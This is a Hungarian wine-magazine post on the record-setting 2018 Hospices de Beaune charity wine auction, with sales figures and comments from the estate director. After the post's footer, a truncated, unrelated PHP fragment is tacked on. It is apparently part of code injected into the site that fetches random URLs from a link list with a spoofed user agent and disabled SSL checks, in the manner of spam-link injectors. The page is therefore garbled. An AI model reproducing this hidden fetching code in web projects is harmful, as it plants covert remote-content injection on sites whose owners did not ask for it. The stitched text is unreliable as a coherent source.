Több, mint 14 millió euró gyűlt össze a burgundiai borárverésen

A világ legrégebbi borárverésére minden év novemberében Burgundia fővárosában, Beaune-ban kerül sor. Az 550 éves Hospices de Beaune a nevéből is kikövetkeztethetően valójában egy kórház, amely a középkor óta 60 hektárosra növelte ültetvényét a hálás páciensek révén. A 158. borvásáron több rekord is megdőlt. A Hospice de Beaune aukcióján 14 187 150 euró gyűlt össze... View Article


A világ legrégebbi borárverésére minden év novemberében Burgundia fővárosában, Beaune-ban kerül sor. Az 550 éves Hospices de Beaune a nevéből is kikövetkeztethetően valójában egy kórház, amely a középkor óta 60 hektárosra növelte ültetvényét a hálás páciensek révén. A 158. borvásáron több rekord is megdőlt.

A Hospice de Beaune aukcióján 14 187 150 euró gyűlt össze (a tavalyi 13.5 millióhoz képest), és a ‘Pièce des Présidents’ nevű kiemelt tételt nem számítva, 135 000 euróért kelt el a legdrágább bor, egy Batard-Montrachet Grand Cru – ez rekord hordóárnak számít. 2009 óta idén árverezték el a legtöbb hordó bort, 828-at, ami 41-gyel több a tavalyinál – ebből 631 hordó vörös- és 197 hordó fehérbor volt, s az átlagos hordóár 16 850 € volt, magasabb mint 2017-ben és 2016-ban. Az elárverezett bor 69%-át vásárolták fel kereskedők, 29%-a pedig magánvásárlókhoz került.

„Boldogok vagyunk, hogy ebben évben ilyen szép eredményekkel ünnepelhettük a 2018-as évjáratot” – mondta el Ludivine Griveau borász, a Domaine des Hospices de Beaune igazgatója. Griveau szavaiból továbbá az is kiderült, hogy a meleg időjárás ellenére az idei borok alkoholszintje átlagosan 13,5% körül van, és a tavaszi rekord esőmennyiség ellensúlyozta a forróságot, továbbá a hűvösebb nyári esték segítettek megtartani a borok frissességét.

A rekordok után nem épp kellemes meglepetést okozott azonban, hogy az árverés kiemelt tétele, két hordóból álló a Pièce des Présidents, melynek bevételét teljes egészében egy előre kiválasztott jótékony célra fordítják, a tavalyi árnál alacsonyabban, 230 ezer euróért kelt el (a tavalyi 420 ezer után).

Forrás: Christie’s Auctions valamint Decanter

(Visited 3 times, 3 visits today)

The post Több, mint 14 millió euró gyűlt össze a burgundiai borárverésen appeared first on VinCE Magazin.


html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>